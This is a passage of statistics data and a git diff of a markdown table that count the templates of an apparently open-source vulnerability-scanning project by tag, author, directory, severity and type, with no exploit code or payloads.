"name":"duomicms","count":1},{"name":"majordomo2","count":1},{"name":"geddy","count":1},{"name":"spip","count":1},{"name":"socomec","count":1},{"name":"varnish","count":1},{"name":"nordex","count":1},{"name":"zend","count":1},{"name":"weiphp","count":1},{"name":"asus","count":1},{"name":"camunda","count":1},{"name":"pippoint","count":1},{"name":"frontpage","count":1},{"name":"loqate","count":1},{"name":"nifi","count":1},{"name":"pgadmin","count":1},{"name":"nearby","count":1},{"name":"biometrics","count":1},{"name":"openweather","count":1},{"name":"fastcgi","count":1},{"name":"phpfastcache","count":1},{"name":"subrion","count":1},{"name":"haproxy","count":1},{"name":"graph","count":1},{"name":"octobercms","count":1},{"name":"tenda","count":1},{"name":"whm","count":1},{"name":"sonarcloud","count":1},{"name":"tensorflow","count":1},{"name":"timesheet","count":1},{"name":"burp","count":1},{"name":"openstack","count":1},{"name":"portainer","count":1},{"name":"vidyo","count":1},{"name":"mod-proxy","count":1},{"name":"xvr","count":1},{"name":"acexy","count":1},{"name":"youtube","count":1},{"name":"expressjs","count":1},{"name":"goahead","count":1},{"name":"primetek","count":1},{"name":"vsphere","count":1},{"name":"servicedesk","count":1},{"name":"digitalocean","count":1},{"name":"eprints","count":1},{"name":"mediumish","count":1},{"name":"natemail","count":1},{"name":"rujjie","count":1},{"name":"addpac","count":1},{"name":"websphere","count":1},{"name":"linksys","count":1},{"name":"monitorix","count":1},{"name":"wavemaker","count":1},{"name":"h3c-imc","count":1},{"name":"eyou","count":1},{"name":"cloudflare","count":1},{"name":"opensmtpd","count":1},{"name":"postmessage","count":1},{"name":"circle","count":1},{"name":"clockwork","count":1},{"name":"elfinder","count":1},{"name":"xml","count":1},{"name":"rmc","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":280},{"name":"dhiyaneshdk","count":273},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":50},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"meme-lord","count":7},{"name":"dogasantos","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"logicalhunter","count":6},{"name":"rootxharsh","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"lu4nx","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"johnk3r","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"f1tz","count":3},{"name":"vsh00t","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"0w4ys","count":3},{"name":"skeltavik","count":3},{"name":"shine","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"jarijaas","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"unstabl3","count":3},{"name":"me9187","count":3},{"name":"johnjhacking","count":3},{"name":"sushantkamble","count":3},{"name":"mavericknerd","count":3},{"name":"idealphase","count":3},{"name":"0xrudra","count":2},{"name":"dheerajmadhukar","count":2},{"name":"vavkamil","count":2},{"name":"bp0lr","count":2},{"name":"bsysop","count":2},{"name":"0xelkomy","count":2},{"name":"moritz nentwig","count":2},{"name":"g4l1t0","count":2},{"name":"convisoappsec","count":2},{"name":"nkxxkn","count":2},{"name":"parth","count":2},{"name":"huowuzhao","count":2},{"name":"whoever","count":2},{"name":"w4cky_","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"socketz","count":2},{"name":"swissky","count":2},{"name":"0xsmiley","count":2},{"name":"cocxanh","count":2},{"name":"joeldeleep","count":2},{"name":"sy3omda","count":2},{"name":"0xcrypto","count":2},{"name":"mohammedsaneem","count":2},{"name":"manas_harsh","count":2},{"name":"afaq","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"bernardofsr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"r3naissance","count":2},{"name":"zomsop82","count":2},{"name":"hetroublemakr","count":2},{"name":"gevakun","count":2},{"name":"foulenzer","count":2},{"name":"random-robbie","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"gal nagli","count":2},{"name":"hahwul","count":2},{"name":"alifathi-h1","count":2},{"name":"ehsahil","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"r12w4n","count":2},{"name":"arcc","count":2},{"name":"udit_thakkur","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"0xprial","count":2},{"name":"pxmme1337","count":2},{"name":"randomrobbie","count":2},{"name":"deena","count":1},{"name":"qlkwej","count":1},{"name":"_harleo","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"x6263","count":1},{"name":"thebinitghimire","count":1},{"name":"bernardo rodrigues @bernardofsr | andrĂ© monteiro @am0nt31r0","count":1},{"name":"makyotox","count":1},{"name":"b4uh0lz","count":1},{"name":"schniggie","count":1},{"name":"andysvints","count":1},{"name":"@ofjaaah","count":1},{"name":"b0rn2r00t","count":1},{"name":"daviey","count":1},{"name":"kurohost","count":1},{"name":"intx0x80","count":1},{"name":"sec_hawk","count":1},{"name":"forgedhallpass","count":1},{"name":"shreyapohekar","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"berkdusunur","count":1},{"name":"affix","count":1},{"name":"ilovebinbash","count":1},{"name":"fopina","count":1},{"name":"notsoevilweasel","count":1},{"name":"elmahdi","count":1},{"name":"rodnt","count":1},{"name":"oscarintherocks","count":1},{"name":"push4d","count":1},{"name":"thezakman","count":1},{"name":"droberson","count":1},{"name":"s1r1u5_","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"juicypotato1","count":1},{"name":"hanlaomo","count":1},{"name":"mhdsamx","count":1},{"name":"akash.c","count":1},{"name":"d0rkerdevil","count":1},{"name":"apt-mirror","count":1},{"name":"revblock","count":1},{"name":"0xrod","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ipanda","count":1},{"name":"ooooooo_q","count":1},{"name":"omarkurt","count":1},{"name":"wabafet","count":1},{"name":"alperenkesk","count":1},{"name":"adrianmf","count":1},{"name":"naglinagli","count":1},{"name":"chron0x","count":1},{"name":"jeya seelan","count":1},{"name":"ringo","count":1},{"name":"undefl0w","count":1},{"name":"yavolo","count":1},{"name":"pudsec","count":1},{"name":"pratik khalane","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"elder tao","count":1},{"name":"elouhi","count":1},{"name":"kabirsuda","count":1},{"name":"furkansenan","count":1},{"name":"ldionmarcil","count":1},{"name":"mubassirpatel","count":1},{"name":"ahmetpergamum","count":1},{"name":"ohlinge","count":1},{"name":"andirrahmani1","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"lark lab","count":1},{"name":"noamrathaus","count":1},{"name":"akshansh","count":1},{"name":"alph4byt3","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"absshax","count":1},{"name":"dawid-czarnecki","count":1},{"name":"its0x08","count":1},{"name":"jrolf","count":1},{"name":"smaranchand","count":1},{"name":"_darrenmartyn","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"0xd0ff9","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"kre80r","count":1},{"name":"nytr0gen","count":1},{"name":"yashgoti","count":1},{"name":"alex","count":1},{"name":"taielab","count":1},{"name":"patralos","count":1},{"name":"ahmed sherif","count":1},{"name":"mass0ma","count":1},{"name":"0xteles","count":1},{"name":"0ut0fb4nd","count":1},{"name":"philippdelteil","count":1},{"name":"hakluke","count":1},{"name":"borna nematzadeh","count":1},{"name":"xstp","count":1},{"name":"thevillagehacker","count":1},{"name":"orpheus","count":1},{"name":"bad5ect0r","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"pdp","count":1},{"name":"aresx","count":1},{"name":"exploitation","count":1},{"name":"@dwisiswant0","count":1},{"name":"infosecsanyam","count":1},{"name":"defr0ggy","count":1},{"name":"sickwell","count":1},{"name":"zandros0","count":1},{"name":"remonsec","count":1},{"name":"0xtavian","count":1},{"name":"nerrorsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"iampritam","count":1},{"name":"tirtha_mandal","count":1},{"name":"co0nan","count":1},{"name":"willd96","count":1},{"name":"gboddin","count":1},{"name":"izn0u","count":1},{"name":"52971","count":1},{"name":"luskabol","count":1},{"name":"retr0","count":1},{"name":"blckraven","count":1},{"name":"bolli95","count":1},{"name":"evolutionsec","count":1},{"name":"clarkvoss","count":1},{"name":"soyelmago","count":1},{"name":"j33n1k4","count":1},{"name":"streetofhackerr007","count":1},{"name":"shelld3v","count":1},{"name":"0h1in9e","count":1},{"name":"rojanrijal","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"un-fmunozs","count":1},{"name":"petruknisme","count":1},{"name":"udyz","count":1},{"name":"zhenwarx","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"toufik airane","count":1},{"name":"yashanand155","count":1},{"name":"becivells","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"bjhulst","count":1},{"name":"vzamanillo","count":1},{"name":"luci","count":1},{"name":"whynotke","count":1},{"name":"knassar702","count":1},{"name":"manuelbua","count":1},{"name":"mesaglio","count":1},{"name":"c3l3si4n","count":1},{"name":"raesene","count":1},{"name":"regala_","count":1},{"name":"flag007","count":1},{"name":"b0yd","count":1},{"name":"mah3sec_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"sshell","count":1},{"name":"brabbit10","count":1},{"name":"tim_koopmans","count":1},{"name":"micha3lb3n","count":1},{"name":"shifacyclewla","count":1},{"name":"_c0wb0y_","count":1},{"name":"fmunozs","count":1},{"name":"nvn1729","count":1},{"name":"ajaysenr","count":1}],"directory":[{"name":"cves","count":831},{"name":"vulnerabilities","count":324},{"name":"exposed-panels","count":264},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":139},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":743},{"name":"high","count":641},{"name":"medium","count":474},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2195},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 49c6906b75..7e62861261 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,917 +1,925 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 | -| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 | -| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 | -| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 | -| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | -| rce | 204 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 49 | | | | | -| cve2021 | 151 | zzeitlin | 63 | workflows | 37 | | | | | -| joomla | 128 | 0x_akoko | 46 | network | 32 | | | | | +| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | +| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | +| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | +| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | +| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | +| cve2021 | 155 | zzeitlin | 63 | workflows | 38 | | | | | +| joomla | 128 | 0x_akoko | 50 | network | 32 | | | | | | cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | -| cve2019 | 97 | philippedelteil | 27 | miscellaneous | 24 | | | | | +| cve2019 | 97 | philippedelteil | 29 | miscellaneous | 24 | | | | | | config | 95 | ice3man | 26 | dns | 12 | | | | | -| cve2018 | 87 | organiccrap | 24 | fuzzing | 10 | | | | | +| cve2018 | 88 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 73 | sheikhrishad | 15 | cnvd | 9 | | | | | | takeover | 69 | pr3r00t | 15 | headless | 5 | | | | | -| iot | 68 | milo2012 | 14 | | | | | | | -| token | 67 | techbrunchfr | 13 | | | | | | | -| default-login | 66 | suman_kar | 12 | | | | | | | +| default-login | 68 | milo2012 | 14 | | | | | | | +| oob | 68 | techbrunchfr | 13 | | | | | | | +| iot | 68 | suman_kar | 12 | | | | | | | +| token | 67 | cyllective | 11 | | | | | | | | token-spray | 63 | r3dg33k | 11 | | | | | | | -| oob | 59 | cyllective | 11 | | | | | | | -| cve2017 | 50 | random_robbie | 10 | | | | | | | -| file | 49 | nadino | 10 | | | | | | | -| unauth | 47 | wdahlenb | 10 | | | | | | | -| network | 43 | righettod | 10 | | | | | | | -| sqli | 40 | melbadry9 | 10 | | | | | | | -| ssrf | 40 | hackergautam | 9 | | | | | | | -| redirect | 37 | that_juan_ | 8 | | | | | | | -| cve2016 | 37 | iamthefrogy | 8 | | | | | | | -| | 37 | aashiq | 8 | | | | | | | -| oracle | 36 | dogasantos | 7 | | | | | | | -| logs | 30 | harshbothra_ | 7 | | | | | | | -| google | 29 | techryptic (@tech) | 7 | | | | | | | -| jira | 28 | meme-lord | 7 | | | | | | | -| atlassian | 27 | randomstr1ng | 7 | | | | | | | -| listing | 27 | emadshanab | 7 | | | | | | | -| cve2014 | 27 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 26 | kophjager007 | 7 | | | | | | | +| cve2017 | 51 | wdahlenb | 10 | | | | | | | +| file | 50 | nadino | 10 | | | | | | | +| unauth | 49 | melbadry9 | 10 | | | | | | | +| network | 43 | random_robbie | 10 | | | | | | | +| ssrf | 41 | righettod | 10 | | | | | | | +| sqli | 40 | hackergautam | 9 | | | | | | | +| | 38 | aashiq | 8 | | | | | | | +| cve2016 | 37 | that_juan_ | 8 | | | | | | | +| redirect | 37 | zh | 8 | | | | | | | +| oracle | 36 | iamthefrogy | 8 | | | | | | | +| logs | 30 | dr_set | 7 | | | | | | | +| google | 30 | emadshanab | 7 | | | | | | | +| jira | 28 | 0x240x23elu | 7 | | | | | | | +| atlassian | 28 | dogasantos | 7 | | | | | | | +| cve2015 | 28 | techryptic (@tech) | 7 | | | | | | | +| cisco | 27 | randomstr1ng | 7 | | | | | | | +| listing | 27 | kophjager007 | 7 | | | | | | | +| cve2014 | 27 | harshbothra_ | 7 | | | | | | | | generic | 24 | oppsec | 7 | | | | | | | -| disclosure | 23 | dr_set | 7 | | | | | | | -| misc | 23 | __fazal | 6 | | | | | | | -| auth-bypass | 23 | puzzlepeaches | 6 | | | | | | | -| cisco | 22 | logicalhunter | 6 | | | | | | | -| router | 21 | caspergn | 6 | | | | | | | +| misc | 23 | meme-lord | 7 | | | | | | | +| disclosure | 23 | puzzlepeaches | 6 | | | | | | | +| auth-bypass | 23 | logicalhunter | 6 | | | | | | | +| router | 21 | divya_mudgal | 6 | | | | | | | | misconfig | 20 | pentest_swissky | 6 | | | | | | | -| aem | 19 | yanyun | 5 | | | | | | | -| debug | 18 | ganofins | 5 | | | | | | | -| springboot | 18 | rootxharsh | 5 | | | | | | | -| cve2012 | 18 | joanbono | 5 | | | | | | | -| sap | 18 | johnk3r | 5 | | | | | | | -| php | 16 | iamnoooob | 5 | | | | | | | -| cve2011 | 15 | xelkomy | 5 | | | | | | | -| fuzz | 14 | panch0r3d | 5 | | | | | | | -| cve2009 | 14 | lu4nx | 5 | | | | | | | -| struts | 14 | elsfa7110 | 5 | | | | | | | -| aws | 14 | e_schultze_ | 4 | | | | | | | -| login | 14 | nodauf | 4 | | | | | | | -| weblogic | 14 | github.com/its0x08 | 4 | | | | | | | -| android | 13 | incogbyte | 4 | | | | | | | -| zoho | 13 | sullo | 3 | | | | | | | -| dns | 13 | tess | 3 | | | | | | | -| adobe | 13 | mavericknerd | 3 | | | | | | | -| devops | 13 | f1tz | 3 | | | | | | | -| jenkins | 12 | yash anand @yashanand155 | 3 | | | | | | | -| dlink | 12 | 0w4ys | 3 | | | | | | | -| manageengine | 12 | emenalf | 3 | | | | | | | -| wp-theme | 11 | shifacyclewala | 3 | | | | | | | -| cve2013 | 11 | binaryfigments | 3 | | | | | | | -| dell | 10 | shine | 3 | | | | | | | -| xxe | 10 | unstabl3 | 3 | | | | | | | -| intrusive | 10 | idealphase | 3 | | | | | | | -| ftp | 9 | _generic_human_ | 3 | | | | | | | -| magento | 9 | z3bd | 3 | | | | | | | -| vmware | 9 | impramodsargar | 3 | | | | | | | -| airflow | 8 | skeltavik | 3 | | | | | | | -| ruijie | 8 | thomas_from_offensity | 3 | | | | | | | -| backup | 8 | vsh00t | 3 | | | | | | | -| nginx | 8 | jarijaas | 3 | | | | | | | -| scada | 8 | sushantkamble | 3 | | | | | | | -| ibm | 8 | fyoorer | 3 | | | | | | | -| rails | 8 | dudez | 3 | | | | | | | -| gitlab | 8 | sy3omda | 2 | | | | | | | -| cve2008 | 8 | alifathi-h1 | 2 | | | | | | | -| cnvd | 8 | mohammedsaneem | 2 | | | | | | | -| microsoft | 8 | me9187 | 2 | | | | | | | -| netgear | 7 | convisoappsec | 2 | | | | | | | -| coldfusion | 7 | g4l1t0 | 2 | | | | | | | -| cms | 7 | randomrobbie | 2 | | | | | | | -| kubernetes | 7 | vavkamil | 2 | | | | | | | -| hp | 7 | ree4pwn | 2 | | | | | | | -| files | 7 | nkxxkn | 2 | | | | | | | -| confluence | 7 | lotusdll | 2 | | | | | | | -| docker | 6 | udit_thakkur | 2 | | | | | | | -| rconfig | 6 | bsysop | 2 | | | | | | | -| citrix | 6 | 0xsmiley | 2 | | | | | | | -| fileupload | 6 | 0xsapra | 2 | | | | | | | -| laravel | 6 | hahwul | 2 | | | | | | | -| api | 6 | r12w4n | 2 | | | | | | | -| nodejs | 6 | afaq | 2 | | | | | | | -| django | 6 | 0xrudra | 2 | | | | | | | -| solr | 6 | cocxanh | 2 | | | | | | | -| camera | 6 | joeldeleep | 2 | | | | | | | -| lucee | 6 | johnjhacking | 2 | | | | | | | -| jetty | 6 | ehsahil | 2 | | | | | | | -| tomcat | 5 | pxmme1337 | 2 | | | | | | | -| printer | 5 | arcc | 2 | | | | | | | -| ssti | 5 | random-robbie | 2 | | | | | | | -| java | 5 | davidmckennirey | 2 | | | | | | | -| windows | 5 | huowuzhao | 2 | | | | | | | -| crlf | 5 | whoever | 2 | | | | | | | +| aem | 19 | caspergn | 6 | | | | | | | +| sap | 18 | __fazal | 6 | | | | | | | +| cve2012 | 18 | ganofins | 5 | | | | | | | +| debug | 18 | rootxharsh | 5 | | | | | | | +| springboot | 18 | lu4nx | 5 | | | | | | | +| php | 16 | xelkomy | 5 | | | | | | | +| cve2011 | 15 | yanyun | 5 | | | | | | | +| devops | 15 | johnk3r | 5 | | | | | | | +| weblogic | 14 | iamnoooob | 5 | | | | | | | +| login | 14 | elsfa7110 | 5 | | | | | | | +| struts | 14 | joanbono | 5 | | | | | | | +| cve2009 | 14 | panch0r3d | 5 | | | | | | | +| fuzz | 14 | e_schultze_ | 4 | | | | | | | +| aws | 14 | github.com/its0x08 | 4 | | | | | | | +| deserialization | 13 | incogbyte | 4 | | | | | | | +| zoho | 13 | nodauf | 4 | | | | | | | +| dns | 13 | johnjhacking | 3 | | | | | | | +| android | 13 | fyoorer | 3 | | | | | | | +| adobe | 13 | emenalf | 3 | | | | | | | +| manageengine | 12 | thomas_from_offensity | 3 | | | | | | | +| dlink | 12 | f1tz | 3 | | | | | | | +| wp-theme | 12 | jarijaas | 3 | | | | | | | +| jenkins | 12 | impramodsargar | 3 | | | | | | | +| magento | 11 | yash anand @yashanand155 | 3 | | | | | | | +| cve2013 | 11 | _generic_human_ | 3 | | | | | | | +| intrusive | 10 | binaryfigments | 3 | | | | | | | +| xxe | 10 | tess | 3 | | | | | | | +| dell | 10 | 0w4ys | 3 | | | | | | | +| hp | 10 | unstabl3 | 3 | | | | | | | +| vmware | 9 | dudez | 3 | | | | | | | +| kubernetes | 9 | shine | 3 | | | | | | | +| ftp | 9 | vsh00t | 3 | | | | | | | +| gitlab | 8 | mavericknerd | 3 | | | | | | | +| cve2008 | 8 | sushantkamble | 3 | | | | | | | +| backup | 8 | me9187 | 3 | | | | | | | +| scada | 8 | sullo | 3 | | | | | | | +| rails | 8 | z3bd | 3 | | | | | | | +| ibm | 8 | shifacyclewala | 3 | | | | | | | +| ruijie | 8 | skeltavik | 3 | | | | | | | +| cnvd | 8 | idealphase | 3 | | | | | | | +| nginx | 8 | bp0lr | 2 | | | | | | | +| airflow | 8 | 0xrudra | 2 | | | | | | | +| microsoft | 8 | socketz | 2 | | | | | | | +| fastjson | 8 | g4l1t0 | 2 | | | | | | | +| netgear | 7 | 0xsapra | 2 | | | | | | | +| cms | 7 | w4cky_ | 2 | | | | | | | +| confluence | 7 | udit_thakkur | 2 | | | | | | | +| coldfusion | 7 | bernardofsr | 2 | | | | | | | +| files | 7 | arcc | 2 | | | | | | | +| drupal | 6 | r3naissance | 2 | | | | | | | +| jetty | 6 | 0xelkomy | 2 | | | | | | | +| laravel | 6 | parth | 2 | | | | | | | +| docker | 6 | 0xsmiley | 2 | | | | | | | +| nodejs | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| solr | 6 | pxmme1337 | 2 | | | | | | | +| lucee | 6 | dheerajmadhukar | 2 | | | | | | | +| rconfig | 6 | koti2 | 2 | | | | | | | +| django | 6 | hetroublemakr | 2 | | | | | | | +| fileupload | 6 | davidmckennirey | 2 | | | | | | | +| api | 6 | huowuzhao | 2 | | | | | | | +| camera | 6 | vavkamil | 2 | | | | | | | +| citrix | 6 | amsda | 2 | | | | | | | +| windows | 5 | mohammedsaneem | 2 | | | | | | | +| jolokia | 5 | fabaff | 2 | | | | | | | +| ssti | 5 | sy3omda | 2 | | | | | | | +| iis | 5 | cocxanh | 2 | | | | | | | +| tomcat | 5 | foulenzer | 2 | | | | | | | +| java | 5 | r12w4n | 2 | | | | | | | +| phpmyadmin | 5 | hahwul | 2 | | | | | | | +| printer | 5 | whoever | 2 | | | | | | | | dedecms | 5 | x1m_martijn | 2 | | | | | | | -| phpmyadmin | 5 | dheerajmadhukar | 2 | | | | | | | -| iis | 5 | fabaff | 2 | | | | | | | -| headless | 5 | 0xcrypto | 2 | | | | | | | -| circarlife | 5 | manas_harsh | 2 | | | | | | | -| jolokia | 5 | moritz nentwig | 2 | | | | | | | -| drupal | 5 | zomsop82 | 2 | | | | | | | -| deserialization | 5 | kiblyn11 | 2 | | | | | | | -| firmware | 4 | socketz | 2 | | | | | | | -| zimbra | 4 | bp0lr | 2 | | | | | | | -| proxy | 4 | gal nagli | 2 | | | | | | | -| wso2 | 4 | gevakun | 2 | | | | | | | -| zabbix | 4 | bernardofsr | 2 | | | | | | | -| elastic | 4 | r3naissance | 2 | | | | | | | -| glpi | 4 | koti2 | 2 | | | | | | | -| thinkphp | 4 | hetroublemakr | 2 | | | | | | | -| thinkcmf | 4 | amsda | 2 | | | | | | | -| traversal | 4 | parth | 2 | | | | | | | -| symfony | 4 | bing0o | 2 | | | | | | | -| vpn | 4 | 0xelkomy | 2 | | | | | | | -| firebase | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| rfi | 4 | w4cky_ | 2 | | | | | | | -| exchange | 4 | foulenzer | 2 | | | | | | | -| asp | 4 | 0xprial | 2 | | | | | | | -| npm | 4 | swissky | 2 | | | | | | | -| amazon | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| hongdian | 4 | exploitation | 1 | | | | | | | -| symantec | 4 | sickwell | 1 | | | | | | | -| buffalo | 4 | 0xtavian | 1 | | | | | | | -| magmi | 4 | qlkwej | 1 | | | | | | | -| slack | 4 | philippdelteil | 1 | | | | | | | -| grafana | 4 | gboddin | 1 | | | | | | | -| maps | 4 | mubassirpatel | 1 | | | | | | | -| webserver | 4 | toufik airane | 1 | | | | | | | -| strapi | 4 | bolli95 | 1 | | | | | | | -| moodle | 4 | izn0u | 1 | | | | | | | -| artifactory | 4 | dawid-czarnecki | 1 | | | | | | | -| fatpipe | 4 | juicypotato1 | 1 | | | | | | | -| git | 4 | ringo | 1 | | | | | | | -| samsung | 4 | alex | 1 | | | | | | | -| solarwinds | 4 | 0ut0fb4nd | 1 | | | | | | | -| resin | 4 | ohlinge | 1 | | | | | | | -| backdoor | 3 | b0rn2r00t | 1 | | | | | | | -| mongodb | 3 | kabirsuda | 1 | | | | | | | -| node | 3 | mesaglio | 1 | | | | | | | -| druid | 3 | makyotox | 1 | | | | | | | -| opensis | 3 | pudsec | 1 | | | | | | | -| ssh | 3 | 52971 | 1 | | | | | | | -| prometheus | 3 | elder tao | 1 | | | | | | | -| telerik | 3 | sshell | 1 | | | | | | | -| nosqli | 3 | brabbit10 | 1 | | | | | | | -| fpd | 3 | mah3sec_ | 1 | | | | | | | -| ebs | 3 | ahmed sherif | 1 | | | | | | | -| httpd | 3 | whynotke | 1 | | | | | | | -| oa | 3 | retr0 | 1 | | | | | | | -| jellyfin | 3 | ajaysenr | 1 | | | | | | | -| injection | 3 | sicksec | 1 | | | | | | | -| nacos | 3 | oscarintherocks | 1 | | | | | | | -| terramaster | 3 | x6263 | 1 | | | | | | | -| tikiwiki | 3 | yashgoti | 1 | | | | | | | -| openam | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| targa | 3 | tim_koopmans | 1 | | | | | | | -| cve2007 | 3 | aaron_costello | 1 | | | | | | | +| crlf | 5 | gevakun | 2 | | | | | | | +| headless | 5 | kiblyn11 | 2 | | | | | | | +| circarlife | 5 | joeldeleep | 2 | | | | | | | +| solarwinds | 4 | 0xprial | 2 | | | | | | | +| thinkphp | 4 | afaq | 2 | | | | | | | +| npm | 4 | ree4pwn | 2 | | | | | | | +| strapi | 4 | gal nagli | 2 | | | | | | | +| resin | 4 | randomrobbie | 2 | | | | | | | +| thinkcmf | 4 | manas_harsh | 2 | | | | | | | +| grafana | 4 | nkxxkn | 2 | | | | | | | +| webserver | 4 | zomsop82 | 2 | | | | | | | +| hongdian | 4 | 0xcrypto | 2 | | | | | | | +| fatpipe | 4 | random-robbie | 2 | | | | | | | +| elastic | 4 | bsysop | 2 | | | | | | | +| maps | 4 | moritz nentwig | 2 | | | | | | | +| exchange | 4 | alifathi-h1 | 2 | | | | | | | +| traversal | 4 | swissky | 2 | | | | | | | +| firmware | 4 | bing0o | 2 | | | | | | | +| rfi | 4 | convisoappsec | 2 | | | | | | | +| samsung | 4 | lotusdll | 2 | | | | | | | +| symantec | 4 | ehsahil | 2 | | | | | | | +| amazon | 4 | mubassirpatel | 1 | | | | | | | +| symfony | 4 | smaranchand | 1 | | | | | | | +| zabbix | 4 | omarkurt | 1 | | | | | | | +| wso2 | 4 | thevillagehacker | 1 | | | | | | | +| asp | 4 | mhdsamx | 1 | | | | | | | +| glpi | 4 | micha3lb3n | 1 | | | | | | | +| firebase | 4 | taielab | 1 | | | | | | | +| zimbra | 4 | luskabol | 1 | | | | | | | +| vpn | 4 | iampritam | 1 | | | | | | | +| git | 4 | hanlaomo | 1 | | | | | | | +| artifactory | 4 | ohlinge | 1 | | | | | | | +| slack | 4 | regala_ | 1 | | | | | | | +| buffalo | 4 | petruknisme | 1 | | | 